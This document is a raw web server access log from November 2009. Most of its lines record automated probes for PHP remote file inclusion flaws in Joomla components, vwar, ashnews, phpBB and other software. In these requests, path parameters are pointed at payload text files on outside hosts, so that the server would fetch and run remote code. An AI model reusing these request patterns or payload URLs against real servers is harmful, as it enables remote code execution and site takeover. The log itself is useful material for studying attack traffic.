213.79.101.98 - - [01/Nov/2009:02:07:57 -0500] "GET /logs/access_log.Q109060500//includes/orderSuccess.inc.php?&glob=1&cart_order_id=1&glob[rootDir]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
213.79.101.98 - - [01/Nov/2009:02:07:57 -0500] "GET /logs//includes/orderSuccess.inc.php?&glob=1&cart_order_id=1&glob[rootDir]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
77.222.131.59 - - [01/Nov/2009:02:08:01 -0500] "GET /senetman/html/index.php?page=http://come.kr/bbs/data2/temp/id1.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
77.222.131.59 - - [01/Nov/2009:02:08:01 -0500] "GET /logs/error_log.Q109071000/senetman/html/index.php?page=http://come.kr/bbs/data2/temp/id1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
77.222.131.59 - - [01/Nov/2009:02:08:01 -0500] "GET /logs/senetman/html/index.php?page=http://come.kr/bbs/data2/temp/id1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
213.79.101.98 - - [01/Nov/2009:02:08:02 -0500] "GET /logs/access_log.Q109052400//includes/orderSuccess.inc.php?&glob=1&cart_order_id=1&glob[rootDir]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
58.103.125.14 - - [01/Nov/2009:02:08:09 -0500] "GET /logs/access_log.Q109072900///?_SERVER[DOCUMENT_ROOT]=http://allskilledtrades.com/site/offer/com_sef/1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
58.103.125.14 - - [01/Nov/2009:02:08:09 -0500] "GET ///?_SERVER[DOCUMENT_ROOT]=http://allskilledtrades.com/site/offer/com_sef/1.txt?? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
91.202.253.13 - - [01/Nov/2009:02:08:09 -0500] "GET /logs/access_log.Q109071100//ashnews.php?pathtoashnews=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 237 "-" "libwww-perl/5.808"
58.103.125.14 - - [01/Nov/2009:02:08:09 -0500] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://allskilledtrades.com/site/offer/com_sef/1.txt?? HTTP/1.1" 200 24204 "-" "Mozilla/5.0"
91.202.253.13 - - [01/Nov/2009:02:08:11 -0500] "GET /logs/access_log.Q109071100//ashnews.php?pathtoashnews=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 237 "-" "libwww-perl/5.808"
209.59.12.99 - - [01/Nov/2009:02:08:12 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
58.103.125.14 - - [01/Nov/2009:02:08:16 -0500] "GET /logs/access_log.Q109090900///?_SERVER[DOCUMENT_ROOT]=http://allskilledtrades.com/site/offer/com_sef/1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
208.89.214.167 - - [01/Nov/2009:02:08:28 -0500] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
208.89.214.167 - - [01/Nov/2009:02:08:28 -0500] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
208.89.214.167 - - [01/Nov/2009:02:08:28 -0500] "GET /logs/access_log.Q109080600%20%20/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
82.193.15.3 - - [01/Nov/2009:02:08:34 -0500] "GET /help.php?css_path=http://www.caindeaf.or.kr/bbs/data/zfxid1.txt? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
82.193.15.3 - - [01/Nov/2009:02:08:34 -0500] "GET /logs/help.php?css_path=http://www.caindeaf.or.kr/bbs/data/zfxid1.txt? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
82.193.15.3 - - [01/Nov/2009:02:08:34 -0500] "GET /logs/access_log.Q109093000/help.php?css_path=http://www.caindeaf.or.kr/bbs/data/zfxid1.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
82.193.15.3 - - [01/Nov/2009:02:08:34 -0500] "GET /logs/error_log.Q109081300/help.php?css_path=http://www.caindeaf.or.kr/bbs/data/zfxid1.txt? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
125.247.60.5 - - [01/Nov/2009:02:08:52 -0500] "GET /logs/access_log.Q109081800//config/dbutil.bck.php?confdir=http://banner4151.co.kr//cgi/order_image/pdid.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
208.89.214.167 - - [01/Nov/2009:02:09:08 -0500] "GET //modules/vwar/admin/admin.php?vwar_root=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
208.89.214.167 - - [01/Nov/2009:02:09:08 -0500] "GET /logs/access_log.Q109070300%20%20//modules/vwar/admin/admin.php?vwar_root=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
208.89.214.167 - - [01/Nov/2009:02:09:08 -0500] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
121.173.40.69 - - [01/Nov/2009:02:09:10 -0500] "GET ///?_SERVER[DOCUMENT_ROOT]=http://allskilledtrades.com/site/offer/com_sef/1.txt?? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
121.173.40.69 - - [01/Nov/2009:02:09:10 -0500] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://allskilledtrades.com/site/offer/com_sef/1.txt?? HTTP/1.1" 200 24204 "-" "Mozilla/5.0"
121.173.40.69 - - [01/Nov/2009:02:09:21 -0500] "GET /logs/access_log.Q109072900%20%20///?_SERVER[DOCUMENT_ROOT]=http://allskilledtrades.com/site/offer/com_sef/1.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
67.195.110.164 - - [01/Nov/2009:02:08:43 -0500] "GET /logs/access_log.Q109071000 HTTP/1.0" 200 3921078 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
121.173.40.69 - - [01/Nov/2009:02:09:29 -0500] "GET /logs/access_log.Q109072900///?_SERVER[DOCUMENT_ROOT]=http://allskilledtrades.com/site/offer/com_sef/1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
121.173.40.69 - - [01/Nov/2009:02:09:29 -0500] "GET ///?_SERVER[DOCUMENT_ROOT]=http://allskilledtrades.com/site/offer/com_sef/1.txt?? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
121.173.40.69 - - [01/Nov/2009:02:09:29 -0500] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://allskilledtrades.com/site/offer/com_sef/1.txt?? HTTP/1.1" 200 24204 "-" "Mozilla/5.0"
208.89.214.167 - - [01/Nov/2009:02:09:31 -0500] "GET /logs/error_log.Q109061900%20%20/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
77.222.40.234 - - [01/Nov/2009:02:09:36 -0500] "GET /logs/error_log.Q109061900//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
121.173.40.69 - - [01/Nov/2009:02:09:37 -0500] "GET /logs/access_log.Q109090900%20%20///?_SERVER[DOCUMENT_ROOT]=http://allskilledtrades.com/site/offer/com_sef/1.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
121.173.40.69 - - [01/Nov/2009:02:09:43 -0500] "GET /logs/access_log.Q109090900///?_SERVER[DOCUMENT_ROOT]=http://allskilledtrades.com/site/offer/com_sef/1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
58.103.125.14 - - [01/Nov/2009:02:10:13 -0500] "GET ///?_SERVER[DOCUMENT_ROOT]=http://allskilledtrades.com/site/offer/com_sef/1.txt?? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
58.103.125.14 - - [01/Nov/2009:02:10:23 -0500] "GET /logs/access_log.Q109072900///?_SERVER[DOCUMENT_ROOT]=http://allskilledtrades.com/site/offer/com_sef/1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
58.103.125.14 - - [01/Nov/2009:02:10:23 -0500] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://allskilledtrades.com/site/offer/com_sef/1.txt?? HTTP/1.1" 200 24204 "-" "Mozilla/5.0"
58.103.125.14 - - [01/Nov/2009:02:10:29 -0500] "GET /logs/access_log.Q109090900///?_SERVER[DOCUMENT_ROOT]=http://allskilledtrades.com/site/offer/com_sef/1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
125.247.60.5 - - [01/Nov/2009:02:10:32 -0500] "GET /logs/access_log.Q109102300//config/dbutil.bck.php?confdir=http://banner4151.co.kr//cgi/order_image/pdid.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
121.136.177.137 - - [01/Nov/2009:02:10:34 -0500] "GET /logs/error_log.Q109042900%20%20/solpot.html?body=http://klorovers.fileave.com/a.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
121.136.177.137 - - [01/Nov/2009:02:10:34 -0500] "GET /solpot.html?body=http://klorovers.fileave.com/a.txt? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
121.136.177.137 - - [01/Nov/2009:02:10:38 -0500] "GET /logs/access_log.Q109072900%20%20/solpot.html?body=http://klorovers.fileave.com/a.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
121.136.177.137 - - [01/Nov/2009:02:10:38 -0500] "GET /logs/solpot.html?body=http://klorovers.fileave.com/a.txt? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
121.136.177.137 - - [01/Nov/2009:02:10:41 -0500] "GET /solpot.html?body=http://klorovers.fileave.com/a.txt? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
121.136.177.137 - - [01/Nov/2009:02:10:41 -0500] "GET /logs/solpot.html?body=http://klorovers.fileave.com/a.txt? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
121.136.177.137 - - [01/Nov/2009:02:10:41 -0500] "GET /logs/access_log.Q109072900%20%20/solpot.html?body=http://klorovers.fileave.com/a.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
121.136.177.137 - - [01/Nov/2009:02:10:42 -0500] "GET /logs/error_log.Q109042900%20%20/solpot.html?body=http://klorovers.fileave.com/a.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
58.103.125.14 - - [01/Nov/2009:02:10:54 -0500] "GET ///?_SERVER[DOCUMENT_ROOT]=http://allskilledtrades.com/site/offer/com_sef/1.txt?? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
58.103.125.14 - - [01/Nov/2009:02:10:54 -0500] "GET /logs/access_log.Q109072900%20%20///?_SERVER[DOCUMENT_ROOT]=http://allskilledtrades.com/site/offer/com_sef/1.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
58.103.125.14 - - [01/Nov/2009:02:10:54 -0500] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://allskilledtrades.com/site/offer/com_sef/1.txt?? HTTP/1.1" 200 24204 "-" "Mozilla/5.0"
208.89.214.167 - - [01/Nov/2009:02:11:03 -0500] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://homesprings.co.kr/plugins/logs/gue/fx29id.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
208.89.214.167 - - [01/Nov/2009:02:11:04 -0500] "GET /logs/access_log.Q109070300%20%20//modules/vwar/admin/admin.php?vwar_root=http://homesprings.co.kr/plugins/logs/gue/fx29id.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
208.89.214.167 - - [01/Nov/2009:02:11:05 -0500] "GET //modules/vwar/admin/admin.php?vwar_root=http://homesprings.co.kr/plugins/logs/gue/fx29id.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
121.136.177.137 - - [01/Nov/2009:02:11:06 -0500] "GET /solpot.html?body=http://klorovers.fileave.com/a.txt? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
121.136.177.137 - - [01/Nov/2009:02:11:06 -0500] "GET /logs/solpot.html?body=http://klorovers.fileave.com/a.txt? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
208.89.214.167 - - [01/Nov/2009:02:11:09 -0500] "GET //modules/vwar/admin/admin.php?vwar_root=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
208.89.214.167 - - [01/Nov/2009:02:11:09 -0500] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
208.89.214.167 - - [01/Nov/2009:02:11:10 -0500] "GET /logs/access_log.Q109070300//modules/vwar/admin/admin.php?vwar_root=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
121.136.177.137 - - [01/Nov/2009:02:11:14 -0500] "GET /logs/access_log.Q109072900%20%20/solpot.html?body=http://klorovers.fileave.com/a.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
208.89.214.167 - - [01/Nov/2009:02:11:17 -0500] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://homesprings.co.kr/plugins/logs/gue/fx29id.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
208.89.214.167 - - [01/Nov/2009:02:11:17 -0500] "GET //modules/vwar/admin/admin.php?vwar_root=http://homesprings.co.kr/plugins/logs/gue/fx29id.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
208.89.214.167 - - [01/Nov/2009:02:11:17 -0500] "GET /logs/access_log.Q109070300//modules/vwar/admin/admin.php?vwar_root=http://homesprings.co.kr/plugins/logs/gue/fx29id.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
121.173.40.69 - - [01/Nov/2009:02:11:22 -0500] "GET ///?_SERVER[DOCUMENT_ROOT]=http://allskilledtrades.com/site/offer/com_sef/1.txt?? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
222.73.17.7 - - [01/Nov/2009:02:11:32 -0500] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
222.73.17.7 - - [01/Nov/2009:02:11:32 -0500] "GET /logs/access_log.Q109062700/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
222.73.17.7 - - [01/Nov/2009:02:11:32 -0500] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
222.73.17.7 - - [01/Nov/2009:02:11:32 -0500] "GET /logs/access_log.Q109052200/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
208.89.214.167 - - [01/Nov/2009:02:11:35 -0500] "GET /logs/access_log.Q109060200%20%20//modules/vwar/admin/admin.php?vwar_root=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
67.195.110.164 - - [01/Nov/2009:02:11:37 -0500] "GET /logs/error_log.Q107092400 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
121.173.40.69 - - [01/Nov/2009:02:11:37 -0500] "GET /logs/access_log.Q109072900///?_SERVER[DOCUMENT_ROOT]=http://allskilledtrades.com/site/offer/com_sef/1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
121.173.40.69 - - [01/Nov/2009:02:11:37 -0500] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://allskilledtrades.com/site/offer/com_sef/1.txt?? HTTP/1.1" 200 24204 "-" "Mozilla/5.0"
222.73.17.7 - - [01/Nov/2009:02:11:38 -0500] "GET /logs/access_log.Q109052000/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
222.73.17.7 - - [01/Nov/2009:02:11:38 -0500] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
222.73.17.7 - - [01/Nov/2009:02:11:38 -0500] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
222.73.17.7 - - [01/Nov/2009:02:11:42 -0500] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
222.73.17.7 - - [01/Nov/2009:02:11:42 -0500] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
222.73.17.7 - - [01/Nov/2009:02:11:42 -0500] "GET /logs/access_log.Q109052000/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
195.13.191.76 - - [01/Nov/2009:02:11:43 -0500] "GET /?sourcedir=http://0pop.com/id.txt? HTTP/1.1" 200 409 "-" "libwww-perl/5.803"
222.122.46.179 - - [01/Nov/2009:02:11:44 -0500] "GET ////index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://hura.fileave.com/NIKOO.txt???? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
222.122.46.179 - - [01/Nov/2009:02:11:44 -0500] "GET /logs/access_log.Q109101900////index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://hura.fileave.com/NIKOO.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
222.122.46.179 - - [01/Nov/2009:02:11:44 -0500] "GET /logs////index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://hura.fileave.com/NIKOO.txt???? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
125.247.60.5 - - [01/Nov/2009:02:11:47 -0500] "GET /logs/access_log.Q109102300//config/dbutil.bck.php?confdir=http://banner4151.co.kr//cgi/order_image/pdid.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
222.122.46.179 - - [01/Nov/2009:02:11:49 -0500] "GET /logs/access_log.Q109051400////index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://hura.fileave.com/NIKOO.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
222.73.17.7 - - [01/Nov/2009:02:11:49 -0500] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
222.73.17.7 - - [01/Nov/2009:02:11:49 -0500] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
222.73.17.7 - - [01/Nov/2009:02:11:49 -0500] "GET /logs/access_log.Q109062700%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
222.73.17.7 - - [01/Nov/2009:02:11:49 -0500] "GET /logs/access_log.Q109052200%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
121.173.40.69 - - [01/Nov/2009:02:11:50 -0500] "GET /logs/access_log.Q109090900///?_SERVER[DOCUMENT_ROOT]=http://allskilledtrades.com/site/offer/com_sef/1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
222.73.17.7 - - [01/Nov/2009:02:11:56 -0500] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
222.73.17.7 - - [01/Nov/2009:02:11:56 -0500] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
222.73.17.7 - - [01/Nov/2009:02:11:56 -0500] "GET /logs/access_log.Q109052000%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
222.73.17.7 - - [01/Nov/2009:02:11:58 -0500] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
222.73.17.7 - - [01/Nov/2009:02:11:58 -0500] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
222.73.17.7 - - [01/Nov/2009:02:11:58 -0500] "GET /logs/access_log.Q109052000%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
222.73.17.7 - - [01/Nov/2009:02:12:05 -0500] "GET /logs/access_log.Q109090700/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
61.47.7.71 - - [01/Nov/2009:02:12:10 -0500] "GET /logs/access_log.Q109071100%20%20//ashnews.php?pathtoashnews=http://www.newminiclub.nl/logo.gif??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
61.47.7.71 - - [01/Nov/2009:02:12:10 -0500] "GET /logs//ashnews.php?pathtoashnews=http://www.newminiclub.nl/logo.gif??? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
61.47.7.71 - - [01/Nov/2009:02:12:10 -0500] "GET //ashnews.php?pathtoashnews=http://www.newminiclub.nl/logo.gif??? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
222.73.17.7 - - [01/Nov/2009:02:12:12 -0500] "GET /logs/access_log.Q109090700/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
195.13.191.76 - - [01/Nov/2009:02:12:16 -0500] "GET /logs/error_log.Q109051900/?sourcedir=http://0pop.com/id.txt? HTTP/1.1" 404 224 "-" "libwww-perl/5.803"
61.47.7.71 - - [01/Nov/2009:02:12:17 -0500] "GET /logs/access_log.Q109061000%20%20//ashnews.php?pathtoashnews=http://www.newminiclub.nl/logo.gif??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
195.13.191.76 - - [01/Nov/2009:02:12:21 -0500] "GET /logs/access_log.Q109051900/?sourcedir=http://0pop.com/id.txt? HTTP/1.1" 404 225 "-" "libwww-perl/5.803"
222.73.17.7 - - [01/Nov/2009:02:12:25 -0500] "GET /logs/access_log.Q109090700%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
222.122.46.179 - - [01/Nov/2009:02:12:27 -0500] "GET ////index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://hura.fileave.com/NIKOO.txt???? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
222.122.46.179 - - [01/Nov/2009:02:12:27 -0500] "GET /logs////index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://hura.fileave.com/NIKOO.txt???? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
222.122.46.179 - - [01/Nov/2009:02:12:27 -0500] "GET /logs/access_log.Q109101900////index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://hura.fileave.com/NIKOO.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
222.122.46.179 - - [01/Nov/2009:02:12:27 -0500] "GET /logs/access_log.Q109051400////index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://hura.fileave.com/NIKOO.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
222.73.17.7 - - [01/Nov/2009:02:12:30 -0500] "GET /logs/access_log.Q109090700%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
121.136.177.137 - - [01/Nov/2009:02:12:45 -0500] "GET /logs/error_log.Q109042900%20%20/solpot.html?body=http://klorovers.fileave.com/a.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
222.73.17.7 - - [01/Nov/2009:02:12:52 -0500] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
222.73.17.7 - - [01/Nov/2009:02:12:52 -0500] "GET /logs/access_log.Q109052000/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
222.73.17.7 - - [01/Nov/2009:02:12:52 -0500] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
222.73.17.7 - - [01/Nov/2009:02:12:55 -0500] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
222.73.17.7 - - [01/Nov/2009:02:12:55 -0500] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
222.73.17.7 - - [01/Nov/2009:02:12:55 -0500] "GET /logs/access_log.Q109052000/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
